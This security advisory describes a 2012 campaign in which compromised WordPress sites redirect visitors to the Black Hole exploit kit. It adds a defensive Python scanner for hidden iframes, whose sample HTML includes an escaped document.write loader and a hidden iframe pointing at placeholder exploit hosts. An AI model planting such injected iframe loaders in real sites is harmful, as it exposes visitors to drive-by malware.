Compromised WordPress sites use Black-Hole Exploit for Drive-by Infection (Feb 3, 2012)


The SonicWALL UTM research team has received reports of a new mass compromise of WordPress websites that leads to drive-by malware downloads through the Black Hole exploit kit. Infection requires no user interaction beyond visiting a page on a compromised WordPress web server. The Black Hole exploit kit probes the visitor's browser and plugins for a list of known vulnerabilities and, when one succeeds, typically downloads and runs a malicious executable. The exploits observed in this campaign target Java vulnerabilities, so whether the attack succeeds depends on whether the visitor's Java is patched; on an unpatched system it leads to the download and execution of a malicious executable without any user consent.

The compromised sites contain an injected malicious script that redirects visitors to the Black Hole exploit kit, as seen below:

[Detected as GAV: ScrInject.WP (Trojan)]

The script is dynamic and serves different content on each visit to the infected site. During analysis, we found that it contained a hidden iframe leading to a Black Hole exploit kit landing page that targets Java vulnerabilities and serves the file df190f61.jar [Detected as GAV: JVExp.A (Trojan)].
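A WordPress administrator checking whether their own pages carry this kind of injection can look for the two artifacts described above: an iframe that is sized to zero or styled invisible, and a script block that builds such an iframe at runtime from escaped strings (unescape/document.write). The scanner below is an added example written for this page, not SonicWALL's code; the sample HTML and the `.invalid` hostnames in it are constructed placeholders, not real indicators from the campaign.

```python
"""Scan page HTML for injected hidden iframes and obfuscated loader scripts.

Added example, not SonicWALL's code. SAMPLE_HTML is constructed for
illustration; the *.invalid hostnames are placeholders, not real indicators.
"""
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

# Inline-style tricks used to keep an iframe off the visitor's screen.
_HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|(?:left|top)\s*:\s*-\d{3,}px", re.I)
# Calls typical of loaders that decode and write an iframe at runtime.
_OBFUSCATION = re.compile(
    r"\b(eval|unescape|String\.fromCharCode|document\.write)\s*\(")
# Percent- or hex-escaped characters; packed loaders contain many of them.
_ESCAPE = re.compile(r"%[0-9a-f]{2}|\\x[0-9a-f]{2}", re.I)


def _tiny(value):
    """True for a width/height attribute of 0 or 1 (bare number or 'Npx')."""
    if value is None:
        return False
    m = re.match(r"\s*(\d+)", value)
    return m is not None and int(m.group(1)) <= 1


class _Scanner(HTMLParser):
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []
        self._in_script = False
        self._script_buf = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            src = a.get("src", "") or ""
            host = (urlparse(src).hostname or "").lower()
            hidden = (_tiny(a.get("width")) or _tiny(a.get("height"))
                      or bool(_HIDDEN_STYLE.search(a.get("style") or "")))
            # Only hidden iframes are reported; legitimate embeds are visible.
            if hidden:
                self.findings.append({
                    "kind": "iframe", "src": src, "hidden": True,
                    "external": bool(host) and host != self.site_host,
                })
        elif tag == "script":
            self._in_script = True
            self._script_buf = []

    def handle_data(self, data):
        if self._in_script:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            body = "".join(self._script_buf)
            calls = sorted({m.group(1) for m in _OBFUSCATION.finditer(body)})
            escapes = len(_ESCAPE.findall(body))
            # Flag only when a decoding/writing call meets a heavily escaped payload.
            if calls and escapes >= 10:
                self.findings.append({
                    "kind": "script", "calls": calls, "escaped_chars": escapes,
                    # Decoding the escapes usually reveals the iframe being written.
                    "decoded_iframe": "<iframe" in unquote(body).lower(),
                })


def scan_html(html, site_host):
    """Return a list of findings for one page; an empty list means nothing suspicious."""
    s = _Scanner(site_host)
    s.feed(html)
    s.close()
    return s.findings


# Constructed sample: one legitimate embed, one escaped loader, one hidden iframe.
SAMPLE_HTML = """<html><body>
<h1>Welcome</h1>
<iframe src="https://www.youtube.com/embed/abc" width="560" height="315"></iframe>
<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2Fexploit.invalid%2Fin.php%22%20width%3D0%20height%3D0%3E%3C%2Fiframe%3E'));</script>
<iframe src="http://landing.invalid/in.php" width="0" height="0" style="visibility:hidden"></iframe>
</body></html>"""

if __name__ == "__main__":
    for finding in scan_html(SAMPLE_HTML, "blog.example"):
        print(finding)
```

Run it against HTML fetched from the site with a browser-like User-Agent, because injections of this kind are frequently served only to real visitors and not to crawlers or to the site owner's own IP; compare the output across several fetches, since the page notes the injected content changes on each visit.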

The JAR file is executed and in turn downloads and executes the downloader Trojan setup.exe [Detected as GAV: Downloader.EWP (Trojan)].

The downloader Trojan can download any malware the attacker chooses. We observed both Zeus Trojan and XP Internet Security 2012 FakeAV being served to the infected machine.

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: ScrInject.WP (Trojan) current hit count: 5714
  • GAV: JVExp.A (Trojan)
  • GAV: Downloader.EWP (Trojan)